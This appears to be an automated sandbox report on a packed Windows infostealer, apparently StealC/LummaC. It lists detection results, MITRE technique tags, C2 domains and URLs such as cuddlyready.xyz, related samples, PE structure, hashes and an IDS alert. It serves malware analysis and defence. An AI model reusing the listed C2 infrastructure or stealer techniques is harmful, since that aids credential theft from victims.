              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory751
              Security Software Discovery
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets2
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              QQ5BxgG5G6.exe57%VirustotalBrowse
              QQ5BxgG5G6.exe61%ReversingLabsWin32.Ransomware.StealC
              QQ5BxgG5G6.exe100%AviraTR/Crypt.XPACK.Gen
              QQ5BxgG5G6.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              cuddlyready.xyz
              104.21.32.96
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                sendypaster.xyzfalse
                  high
                  cuddlyready.xyztrue
                    unknown
                    steppriflej.xyzfalse
                      high
                      ripe-blade.cyoufalse
                        high
                        greywe-snotty.cyoufalse
                          high
                          https://cuddlyready.xyz/apitrue
                            unknown
                            smash-boiling.cyoufalse
                              high
                              supporse-comment.cyoufalse
                                high
                                hosue-billowy.cyoufalse
                                  high
                                  pollution-raker.cyoufalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://cuddlyready.xyz/ZQQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://duckduckgo.com/chrome_newtabQQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cuddlyready.xyz/a8QQ5BxgG5G6.exe, 00000000.00000003.1580143357.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579237767.0000000001635000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/ac/?q=QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cuddlyready.xyz/apisQQ5BxgG5G6.exe, 00000000.00000002.1635634925.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634334937.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoQQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://cuddlyready.xyz:443/apilQQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001593000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://cuddlyready.xyz/api/QQ5BxgG5G6.exe, 00000000.00000003.1530950088.0000000005CDE000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1530842219.0000000005CD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://cuddlyready.xyz/piQQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://cuddlyready.xyz/QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cuddlyready.xyz/hQQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.rootca1.amazontrust.com0:QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiQQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brQQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cuddlyready.xyz:443/apiQQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://cuddlyready.xyz/pi0QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://crl.microQQ5BxgG5G6.exe, 00000000.00000003.1580254004.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579432168.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634153690.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgQQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://x1.c.lencr.org/0QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://x1.i.lencr.org/0QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cuddlyready.xyz//QQ5BxgG5G6.exe, 00000000.00000003.1509661602.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509917557.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509507807.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchQQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uQQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctaQQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgQQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.org/products/firefoxgro.allQQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.32.96
                                                                                                          cuddlyready.xyzUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1579757
                                                                                                          Start date and time:2024-12-23 08:37:50 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 4m 21s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:5
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:QQ5BxgG5G6.exe
                                                                                                          renamed because original name is a hash value
                                                                                                          Original Sample Name:4a7846259e3d582b57bd30c67322c357.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                                          EGA Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 0
                                                                                                          • Number of non-executed functions: 2
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target QQ5BxgG5G6.exe, PID 7792 because there are no executed function
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          TimeTypeDescription
                                                                                                          02:38:50API Interceptor8x Sleep call for process: QQ5BxgG5G6.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.32.96LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            cuddlyready.xyzFjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.150.173
                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.150.173
                                                                                                            w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 193.143.1.9
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSFjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.150.173
                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.150.173
                                                                                                            w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.36.201
                                                                                                            0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.199.72
                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.36.201
                                                                                                            NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.199.72
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.32.96
                                                                                                            pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.32.96
                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.32.96
                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.32.96
                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.32.96
                                                                                                            No context
                                                                                                            No created / dropped files found
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.949561489369776
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:QQ5BxgG5G6.exe
                                                                                                            File size:1'866'752 bytes
                                                                                                            MD5:4a7846259e3d582b57bd30c67322c357
                                                                                                            SHA1:3e54a3d27a36c4a24b7f642da39c0477d23d1848
                                                                                                            SHA256:11774b91cf5fc5c4ad30a79ea9a2159271de17c68b2ac7149b15fb23d9828587
                                                                                                            SHA512:ef08f1c3490cfb183d2ed17509a31fd10457adb0d8a98fb00401c30570cc1527dec561156c935b584334ba9b39f02b5e186c467d88efed3d756a54d7a8ceff89
                                                                                                            SSDEEP:49152:gVhyhC3VahV9jLzeUOQngQT1EAiDabGkyLkccZpC:ywCch/L9ngu1EdDNps0
                                                                                                            TLSH:1885339F7C8BC636C1BC4639F9874FC8AF6B8846D5170D20BE0983B2E617325B955392
                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. J...........@..........................PJ......U....@.................................T0..h..
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x8a2000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                            Instruction
                                                                                                            jmp 00007F88DC52011Ah
                                                                                                            cvtps2pd xmm3, qword ptr [eax+eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jmp 00007F88DC522115h
                                                                                                            add byte ptr [0000000Ah], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dl
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edx], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [0200000Ah], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [ecx], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            pop es
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            0x10000x510000x24800e6e41231c0f8c7e0b9c948233ffab0bcFalse0.9973177975171232data7.976685919337456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            0x540000x2ad0000x2006b8e315819f3bc3708aa7522d5c2f10dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            irlkmphe0x3010000x1a00000x19f800b4f804204ea7733467df9202e6a9e140False0.9946247931708785data7.95433500185407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            zsmofqts0x4a10000x10000x400c3ab4e098a4dea22cd9ab37d1a64453aFalse0.724609375data5.808743851736421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .taggant0x4a20000x30000x22009fafd61aaa92459ada90d45e6e362fc3False0.05962775735294118DOS executable (COM)0.7960984011552383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                            DLLImport
                                                                                                            kernel32.dlllstrcpy
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-23T08:38:50.538800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705104.21.32.96443TCP
